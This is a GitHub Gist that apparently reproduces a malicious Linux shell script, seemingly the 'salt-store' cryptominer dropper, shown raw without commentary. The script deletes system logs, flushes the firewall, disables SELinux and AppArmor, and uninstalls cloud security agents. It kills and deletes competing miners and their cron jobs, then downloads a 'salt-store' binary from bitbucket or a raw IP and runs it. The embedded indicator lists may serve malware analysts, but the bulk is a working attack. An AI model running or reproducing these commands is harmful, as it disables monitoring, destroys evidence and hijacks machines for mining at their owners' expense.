Created
May 3, 2020 09:56
-
-
Save olliencc/38841c8a92456e2ce8af46cfb7184df6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /bin/sh | |
| ulimit -n 65535 | |
| rm -rf /var/log/syslog | |
| chattr -iua /tmp/ | |
| chattr -iua /var/tmp/ | |
| ufw disable | |
| iptables -F | |
| echo "nope" >/tmp/log_rot | |
| sudo sysctl kernel.nmi_watchdog=0 | |
| echo '0' >/proc/sys/kernel/nmi_watchdog | |
| echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf | |
| userdel akay | |
| userdel vfinder | |
| chattr -iae /root/.ssh/ | |
| chattr -iae /root/.ssh/authorized_keys | |
| rm -rf /tmp/addres* | |
| rm -rf /tmp/walle* | |
| rm -rf /tmp/keys | |
| if ps aux | |
| grep -i '[a]liyun' | |
| curl http://update.aegis.aliyun.com/download/uninstall.sh | |
| curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | |
| pkill aliyun-service | |
| rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service | |
| rm -rf /usr/local/aegis* | |
| systemctl stop aliyun.service | |
| systemctl disable aliyun.service | |
| service bcm-agent stop | |
| yum remove bcm-agent -y | |
| apt-get remove bcm-agent -y | |
| elif ps aux | |
| grep -i '[y]unjing' | |
| /usr/local/qcloud/stargate/admin/uninstall.sh | |
| /usr/local/qcloud/YunJing/uninst.sh | |
| /usr/local/qcloud/monitor/barad/admin/uninstall.sh | |
| netstat -anp | |
| grep 185.71.65.238 | |
| awk '{print $7}' | |
| awk -F'[/]' '{print $1}' | |
| xargs -I % kill -9 % | |
| grep 140.82.52.87 | |
| grep :443 | |
| grep -v "-" | |
| grep :23 | |
| grep :143 | |
| grep :2222 | |
| grep :3333 | |
| grep :3389 | |
| grep :4444 | |
| grep :5555 | |
| grep :6666 | |
| grep :6665 | |
| grep :6667 | |
| grep :7777 | |
| grep :8444 | |
| grep :3347 | |
| grep :14444 | |
| grep :14433 | |
| grep :13531 | |
| ps aux | |
| grep "sleep 60" | |
| grep -v grep | |
| awk '{print $2}' | |
| grep "./crun" | |
| grep -vw salt-minions | |
| awk '{if($3>80.0) print $2}' | |
| grep ':3333' | |
| grep ':5555' | |
| grep 'kworker -c\' | |
| grep 'log_' | |
| grep 'systemten' | |
| grep 'netns' | |
| grep 'voltuned' | |
| grep 'darwin' | |
| grep '/tmp/dl' | |
| grep '/tmp/ddg' | |
| grep '/tmp/pprt' | |
| grep '/tmp/ppol' | |
| grep '/tmp/65ccE*' | |
| grep '/tmp/jmx*' | |
| grep '/tmp/2Ne80*' | |
| grep 'IOFoqIgyC0zmf2UR' | |
| grep '45.76.122.92' | |
| grep '51.38.191.178' | |
| grep '51.15.56.161' | |
| grep '86s.jpg' | |
| grep 'aGTSGJJp' | |
| grep 'nMrfmnRa' | |
| grep 'PuNY5tm2' | |
| grep 'I0r8Jyyt' | |
| grep 'AgdgACUD' | |
| grep 'uiZvwxG8' | |
| grep 'hahwNEdB' | |
| grep 'BtwXn5qH' | |
| grep '3XEzey2T' | |
| grep 't2tKrCSZ' | |
| grep 'HD7fcBgg' | |
| grep 'zXcDajSs' | |
| grep '3lmigMo' | |
| grep 'AkMK4A2' | |
| grep 'AJ2AkKe' | |
| grep 'HiPxCJRS' | |
| grep 'http_0xCC030' | |
| grep 'http_0xCC031' | |
| grep 'http_0xCC032' | |
| grep 'http_0xCC033' | |
| grep "C4iLM4L" | |
| grep 'aziplcr72qjhzvin' | |
| awk '{ if(substr($11,1,2)=="./" | |
| substr($12,1,2)=="./") print $2 }' | |
| grep '/boot/vmlinuz' | |
| grep "i4b503a52cc5" | |
| grep "dgqtrcst23rtdi3ldqk322j2" | |
| grep "2g0uv7npuhrlatd" | |
| grep "nqscheduler" | |
| grep "rkebbwgqpl4npmm" | |
| grep -v aux | |
| grep "]" | |
| awk '$3>10.0{print $2}' | |
| grep "2fhtu70teuhtoh78jc5s" | |
| grep "0kwti6ut420t" | |
| grep "44ct7udt0patws3agkdfqnjm" | |
| grep -v "/" | |
| grep -v "_" | |
| awk 'length($11)>19{print $2}' | |
| grep "\[ | |
| grep "rsync" | |
| grep "watchd0g" | |
| egrep 'wnTKYg | |
| qW3xT.2 | |
| grep "158.69.133.18:8220" | |
| grep "/tmp/java" | |
| grep 'gitee.com' | |
| grep '/tmp/java' | |
| grep '104.248.4.162' | |
| grep '89.35.39.78' | |
| grep '/dev/shm/z3.sh' | |
| grep 'kthrotlds' | |
| grep 'ksoftirqds' | |
| grep 'netdns' | |
| grep 'watchdogs' | |
| grep -v root | |
| grep -v dblaunch | |
| grep -v dblaunchs | |
| grep -v dblaunched | |
| grep -v apache2 | |
| grep -v atd | |
| grep -v salt-minions | |
| awk '$3>80.0{print $2}' | |
| grep " ps" | |
| grep "sync_supers" | |
| cut -c 9-15 | |
| grep "cpuset" | |
| grep "x]" | |
| grep "sh] <" | |
| grep " \[]" | |
| grep '/tmp/l.sh' | |
| grep '/tmp/zmcat' | |
| grep 'CnzFVPLF' | |
| grep 'CvKzzZLs' | |
| grep '/tmp/udevd' | |
| grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | |
| grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | |
| grep 'sustse' | |
| grep 'sustse3' | |
| grep 'mr.sh' | |
| grep 'wget' | |
| grep 'curl' | |
| grep '2mr.sh' | |
| grep 'cr5.sh' | |
| grep 'logo9.jpg' | |
| grep 'j2.conf' | |
| grep 'luk-cpu' | |
| grep 'ficov' | |
| grep 'he.sh' | |
| grep 'miner.sh' | |
| grep 'nullcrew' | |
| grep '107.174.47.156' | |
| grep '83.220.169.247' | |
| grep '51.38.203.146' | |
| grep '144.217.45.45' | |
| grep '107.174.47.181' | |
| grep '176.31.6.16' | |
| ps auxf | |
| grep "mine.moneropool.com" | |
| grep "pool.t00ls.ru" | |
| grep "xmr.crypto-pool.fr:8080" | |
| grep "xmr.crypto-pool.fr:3333" | |
| grep "[email protected]" | |
| grep "monerohash.com" | |
| grep "/tmp/a7b104c270" | |
| grep "xmr.crypto-pool.fr:6666" | |
| grep "xmr.crypto-pool.fr:7777" | |
| grep "xmr.crypto-pool.fr:443" | |
| grep "stratum.f2pool.com:8888" | |
| grep "xmrpool.eu" | |
| grep xiaoyao | |
| grep xiaoxue | |
| netstat -antp | |
| grep '46.243.253.15' | |
| grep 'ESTABLISHED\ | |
| SYN_SENT' | |
| sed -e "s/\/.*//g" | |
| grep '108.174.197.76' | |
| grep '192.236.161.6' | |
| grep '88.99.242.92' | |
| pkill -f pastebin | |
| pkill -f 185.193.127.115 | |
| pgrep -f monerohash | |
| pgrep -f L2Jpbi9iYXN | |
| pgrep -f xzpauectgr | |
| pgrep -f slxfbkmxtd | |
| pgrep -f mixtape | |
| pgrep -f addnj | |
| pgrep -f 200.68.17.196 | |
| pgrep -f IyEvYmluL3NoCgpzUG | |
| pgrep -f KHdnZXQgLXFPLSBodHRw | |
| pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | |
| pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | |
| pgrep -f mwyumwdbpq.conf | |
| pgrep -f honvbsasbf.conf | |
| pgrep -f mqdsflm.cf | |
| pgrep -f stratum | |
| pgrep -f lower.sh | |
| pgrep -f ./ppp | |
| pgrep -f cryptonight | |
| pgrep -f ./seervceaess | |
| pgrep -f ./servceaess | |
| pgrep -f ./servceas | |
| pgrep -f ./servcesa | |
| pgrep -f ./vsp | |
| pgrep -f ./jvs | |
| pgrep -f ./pvv | |
| pgrep -f ./vpp | |
| pgrep -f ./pces | |
| pgrep -f ./rspce | |
| pgrep -f ./haveged | |
| pgrep -f ./jiba | |
| pgrep -f ./watchbog | |
| pgrep -f ./A7mA5gb | |
| pgrep -f kacpi_svc | |
| pgrep -f kswap_svc | |
| pgrep -f kauditd_svc | |
| pgrep -f kpsmoused_svc | |
| pgrep -f kseriod_svc | |
| pgrep -f kthreadd_svc | |
| pgrep -f ksoftirqd_svc | |
| pgrep -f kintegrityd_svc | |
| pgrep -f jawa | |
| pgrep -f oracle.jpg | |
| pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | |
| pgrep -f 188.209.49.54 | |
| pgrep -f 181.214.87.241 | |
| pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | |
| pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | |
| pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | |
| pgrep -f servim | |
| pgrep -f kblockd_svc | |
| pgrep -f native_svc | |
| pgrep -f ynn | |
| pgrep -f 65ccEJ7 | |
| pgrep -f jmxx | |
| pgrep -f 2Ne80nA | |
| pgrep -f sysstats | |
| pgrep -f systemxlv | |
| pgrep -f watchbog | |
| pgrep -f OIcJi1m | |
| pkill -f biosetjenkins | |
| pkill -f Loopback | |
| pkill -f apaceha | |
| pkill -f cryptonight | |
| pkill -f stratum | |
| pkill -f mixnerdx | |
| pkill -f performedl | |
| pkill -f JnKihGjn | |
| pkill -f irqba2anc1 | |
| pkill -f irqba5xnc1 | |
| pkill -f irqbnc1 | |
| pkill -f ir29xc1 | |
| pkill -f conns | |
| pkill -f irqbalance | |
| pkill -f crypto-pool | |
| pkill -f XJnRj | |
| pkill -f mgwsl | |
| pkill -f pythno | |
| pkill -f jweri | |
| pkill -f lx26 | |
| pkill -f NXLAi | |
| pkill -f BI5zj | |
| pkill -f askdljlqw | |
| pkill -f minerd | |
| pkill -f minergate | |
| pkill -f Guard.sh | |
| pkill -f ysaydh | |
| pkill -f bonns | |
| pkill -f donns | |
| pkill -f kxjd | |
| pkill -f Duck.sh | |
| pkill -f bonn.sh | |
| pkill -f conn.sh | |
| pkill -f kworker34 | |
| pkill -f kw.sh | |
| pkill -f pro.sh | |
| pkill -f polkitd | |
| pkill -f acpid | |
| pkill -f icb5o | |
| pkill -f nopxi | |
| pkill -f irqbalanc1 | |
| pkill -f i586 | |
| pkill -f gddr | |
| pkill -f mstxmr | |
| pkill -f ddg.2011 | |
| pkill -f wnTKYg | |
| pkill -f deamon | |
| pkill -f disk_genius | |
| pkill -f sourplum | |
| pkill -f nanoWatch | |
| pkill -f zigw | |
| pkill -f devtool | |
| pkill -f devtools | |
| pkill -f systemctI | |
| pkill -f watchbog | |
| pkill -f sustes | |
| pkill -f xmrig | |
| pkill -f xmrig-cpu | |
| pkill -f 121.42.151.137 | |
| pkill -f sysguard | |
| pkill -f networkservice | |
| pkill -f sysupdate | |
| pkill -f init12.cfg | |
| pkill -f nginxk | |
| pkill -f tmp/wc.conf | |
| pkill -f xmrig-notls | |
| pkill -f xmr-stak | |
| pkill -f suppoie | |
| pkill -f zer0day.ru | |
| pkill -f dbus-daemon--system | |
| pkill -f nullcrew | |
| pkill -f kworkerds | |
| pkill -f init10.cfg | |
| pkill -f /wl.conf | |
| pkill -f crond64 | |
| pkill -f sustse | |
| pkill -f vmlinuz | |
| pkill -f exin | |
| pkill -f apachiii | |
| rm -rf /usr/bin/config.json | |
| rm -rf /usr/bin/exin | |
| killall log_rot | |
| pkill -f log_rot | |
| rm -rf /tmp/wc.conf | |
| rm -rf /tmp/log_rot | |
| rm -rf /tmp/apachiii | |
| rm -rf /tmp/sustse | |
| rm -rf /tmp/php | |
| rm -rf /tmp/p2.conf | |
| rm -rf /tmp/pprt | |
| rm -rf /tmp/ppol | |
| rm -rf /tmp/javax/config.sh | |
| rm -rf /tmp/javax/sshd2 | |
| rm -rf /tmp/.profile | |
| rm -rf /tmp/1.so | |
| rm -rf /tmp/kworkerds | |
| rm -rf /tmp/kworkerds3 | |
| rm -rf /tmp/kworkerdssx | |
| rm -rf /tmp/xd.json | |
| rm -rf /tmp/syslogd | |
| rm -rf /tmp/syslogdb | |
| rm -rf /tmp/65ccEJ7 | |
| rm -rf /tmp/jmxx | |
| rm -rf /tmp/2Ne80nA | |
| rm -rf /tmp/dl | |
| rm -rf /tmp/ddg | |
| rm -rf /tmp/systemxlv | |
| rm -rf /tmp/systemctI | |
| rm -rf /tmp/.abc | |
| rm -rf /tmp/osw.hb | |
| rm -rf /tmp/.tmpleve | |
| rm -rf /tmp/.tmpnewzz | |
| rm -rf /tmp/.java | |
| rm -rf /tmp/.omed | |
| rm -rf /tmp/.tmpc | |
| rm -rf /tmp/gates.lod | |
| rm -rf /tmp/conf.n | |
| rm -rf /tmp/update.sh | |
| rm -rf /tmp/devtool | |
| rm -rf /tmp/devtools | |
| rm -rf /tmp/fs | |
| rm -rf /tmp/.rod | |
| rm -rf /tmp/.rod.tgz | |
| rm -rf /tmp/.rod.tgz.1 | |
| rm -rf /tmp/.rod.tgz.2 | |
| rm -rf /tmp/.mer | |
| rm -rf /tmp/.mer.tgz | |
| rm -rf /tmp/.mer.tgz.1 | |
| rm -rf /tmp/.hod | |
| rm -rf /tmp/.hod.tgz | |
| rm -rf /tmp/.hod.tgz.1 | |
| rm -rf /tmp/84Onmce | |
| rm -rf /tmp/C4iLM4L | |
| rm -rf /tmp/lilpip | |
| rm -rf /tmp/3lmigMo | |
| rm -rf /tmp/am8jmBP | |
| rm -rf /tmp/tmp.txt | |
| rm -rf /tmp/baby | |
| rm -rf /tmp/.lib | |
| rm -rf /tmp/systemd | |
| rm -rf /tmp/lib.tar.gz | |
| rm -rf /tmp/java | |
| rm -rf /tmp/j2.conf | |
| rm -rf /tmp/.mynews1234 | |
| rm -rf /tmp/a3e12d | |
| rm -rf /tmp/.pt | |
| rm -rf /tmp/.pt.tgz | |
| rm -rf /tmp/.pt.tgz.1 | |
| rm -rf /tmp/go | |
| rm -rf /tmp/.tmpnewasss | |
| rm -rf /tmp/go.sh | |
| rm -rf /tmp/go2.sh | |
| rm -rf /tmp/khugepageds | |
| rm -rf /tmp/.censusqqqqqqqqq | |
| rm -rf /tmp/.kerberods | |
| rm -rf /tmp/kerberods | |
| rm -rf /tmp/seasame | |
| rm -rf /tmp/touch | |
| rm -rf /tmp/.p | |
| rm -rf /tmp/runtime2.sh | |
| rm -rf /tmp/runtime.sh | |
| rm -rf /dev/shm/z3.sh | |
| rm -rf /dev/shm/z2.sh | |
| rm -rf /dev/shm/.scr | |
| rm -rf /dev/shm/.kerberods | |
| rm -f /etc/ld.so.preload | |
| rm -f /usr/local/lib/libioset.so | |
| chattr -i /etc/ld.so.preload | |
| rm -rf /tmp/watchdogs | |
| rm -rf /etc/cron.d/tomcat | |
| rm -rf /etc/rc.d/init.d/watchdogs | |
| rm -rf /usr/sbin/watchdogs | |
| rm -f /tmp/kthrotlds | |
| rm -f /etc/rc.d/init.d/kthrotlds | |
| rm -rf /tmp/.sysbabyuuuuu12 | |
| rm -rf /tmp/logo9.jpg | |
| rm -rf /tmp/miner.sh | |
| rm -rf /tmp/nullcrew | |
| rm -rf /tmp/proc | |
| rm -rf /tmp/2.sh | |
| rm /opt/atlassian/confluence/bin/1.sh | |
| rm /opt/atlassian/confluence/bin/1.sh.1 | |
| rm /opt/atlassian/confluence/bin/1.sh.2 | |
| rm /opt/atlassian/confluence/bin/1.sh.3 | |
| rm /opt/atlassian/confluence/bin/3.sh | |
| rm /opt/atlassian/confluence/bin/3.sh.1 | |
| rm /opt/atlassian/confluence/bin/3.sh.2 | |
| rm /opt/atlassian/confluence/bin/3.sh.3 | |
| rm -rf /var/tmp/f41 | |
| rm -rf /var/tmp/2.sh | |
| rm -rf /var/tmp/config.json | |
| rm -rf /var/tmp/xmrig | |
| rm -rf /var/tmp/1.so | |
| rm -rf /var/tmp/kworkerds3 | |
| rm -rf /var/tmp/kworkerdssx | |
| rm -rf /var/tmp/kworkerds | |
| rm -rf /var/tmp/wc.conf | |
| rm -rf /var/tmp/nadezhda. | |
| rm -rf /var/tmp/nadezhda.arm | |
| rm -rf /var/tmp/nadezhda.arm.1 | |
| rm -rf /var/tmp/nadezhda.arm.2 | |
| rm -rf /var/tmp/nadezhda.x86_64 | |
| rm -rf /var/tmp/nadezhda.x86_64.1 | |
| rm -rf /var/tmp/nadezhda.x86_64.2 | |
| rm -rf /var/tmp/sustse3 | |
| rm -rf /var/tmp/sustse | |
| rm -rf /var/tmp/moneroocean/ | |
| rm -rf /var/tmp/devtool | |
| rm -rf /var/tmp/devtools | |
| rm -rf /var/tmp/play.sh | |
| rm -rf /var/tmp/systemctI | |
| rm -rf /var/tmp/update.sh | |
| rm -rf /var/tmp/.java | |
| rm -rf /var/tmp/1.sh | |
| rm -rf /var/tmp/conf.n | |
| rm -r /var/tmp/lib | |
| rm -r /var/tmp/.lib | |
| rm -rf /tmp/config.json | |
| chattr -iau /tmp/lok | |
| chmod +700 /tmp/lok | |
| rm -rf /tmp/lok | |
| yum install -y docker.io | |
| apt-get install docker.io | |
| docker ps | |
| grep "pocosow" | |
| awk '{print $1}' | |
| xargs -I % docker kill % | |
| grep "gakeaws" | |
| grep "azulu" | |
| grep "auto" | |
| grep "xmr" | |
| grep "mine" | |
| grep "monero" | |
| grep "slowhttp" | |
| grep "bash.shell" | |
| grep "entrypoint.sh" | |
| grep "/var/sbin/bash" | |
| docker images -a | |
| awk '{print $3}' | |
| xargs -I % docker rmi -f % | |
| grep "buster-slim" | |
| grep "hello-" | |
| grep "registry" | |
| setenforce 0 | |
| echo SELINUX=disabled >/etc/selinux/config | |
| service apparmor stop | |
| systemctl disable apparmor | |
| service aliyun.service stop | |
| grep 'aegis' | |
| grep 'Yun' | |
| rm -rf /usr/local/aegis | |
| LDR="wget -q -O -" | |
| if [ -s /usr/bin/curl ] | |
| LDR="curl" | |
| if [ -s /usr/bin/wget ] | |
| WGET="wget -O" | |
| WGET="curl -o" | |
| DIR="/tmp" | |
| if [ -e "/tmp/salt-store" ] | |
| if [ -w "/tmp/salt-store" ] | |
| -d "/tmp/salt-store" ] | |
| if [ -x "$(command -v md5sum)" ] | |
| sum=$(md5sum /tmp/salt-store | |
| awk '{ print $1 }') | |
| echo $sum | |
| case $sum in | |
| 8ec3385e20d6d9a88bc95831783beaeb) | |
| echo "salt-store OK" | |
| *) | |
| echo "salt-store wrong" | |
| rm -rf /tmp/salt-store | |
| sleep 1 | |
| esac | |
| fi | |
| echo "P OK" | |
| else | |
| DIR=$(mktemp -d)/tmp | |
| mkdir $DIR | |
| echo "T DIR $DIR" | |
| if [ -d "/var/tmp" ] | |
| DIR="/var/tmp" | |
| echo "P NOT EXISTS" | |
| download() { | |
| sum=$(md5sum $DIR/salt-store | |
| download2 | |
| echo "No md5sum" | |
| download2() { | |
| $WGET $DIR/salt-store https://bitbucket.org/samk12dd/git/raw/master/salt-store | |
| chmod +x $DIR/salt-store | |
| download3 | |
| download3() { | |
| $WGET $DIR/salt-store http://217.12.210.192/salt-store | |
| download | |
| SKL=sa $DIR/salt-store | |
| crontab -l | |
| sed '/update.sh/d' | |
| crontab - | |
| sed '/logo4/d' | |
| sed '/logo9/d' | |
| sed '/logo0/d' | |
| sed '/logo/d' | |
| sed '/tor2web/d' | |
| sed '/jpg/d' | |
| sed '/png/d' | |
| sed '/tmp/d' | |
| sed '/zmreplchkr/d' | |
| sed '/aliyun.one/d' | |
| sed '/3.215.110.66.one/d' | |
| sed '/pastebin/d' | |
| sed '/onion/d' | |
| sed '/lsd.systemten.org/d' | |
| sed '/shuf/d' | |
| sed '/ash/d' | |
| sed '/mr.sh/d' | |
| sed '/185.181.10.234/d' | |
| sed '/localhost.xyz/d' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment